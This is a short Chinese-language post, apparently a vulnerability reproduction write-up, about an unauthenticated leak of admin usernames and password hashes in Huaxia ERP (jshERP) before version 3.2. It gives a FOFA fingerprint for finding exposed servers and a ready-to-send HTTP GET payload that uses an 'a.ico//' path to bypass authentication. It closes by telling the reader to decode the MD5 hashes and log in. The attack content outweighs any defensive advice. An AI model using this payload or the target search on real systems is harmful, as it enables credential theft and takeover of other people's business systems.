Babing
Published on 2024-08-30 / 3 Visits
0
0

H7-2华夏-ERP-ImformationLeakage

H7-2华夏-ERP-ImformationLeakage

漏洞描述:

华夏ERP 3.1版本中存在一个问题,被评定为有问题的。该问题影响了文件/user/getAllList的某些未知处理过程。未经身份验证的攻击者可以利用此问题获取后台用户名密码列表。可导致后台被控,漏洞已被公开披露,可能被利用。

影响版本:

华夏ERP < 3.2  

网站图片:

024eeb36ac634368a036d4235ecfb530.png

网络测绘:

fofa语法:

FOFA:“jshERP-boot”

漏洞复现:

payload:

GET /jshERP-boot/user/a.ico//getAllList HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
sec-ch-ua-platform: "Windows"
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

效果图:
0b5b9b47efb84a8db9de9c9be7ec2b71.png
密码md5解码即可登录


Comment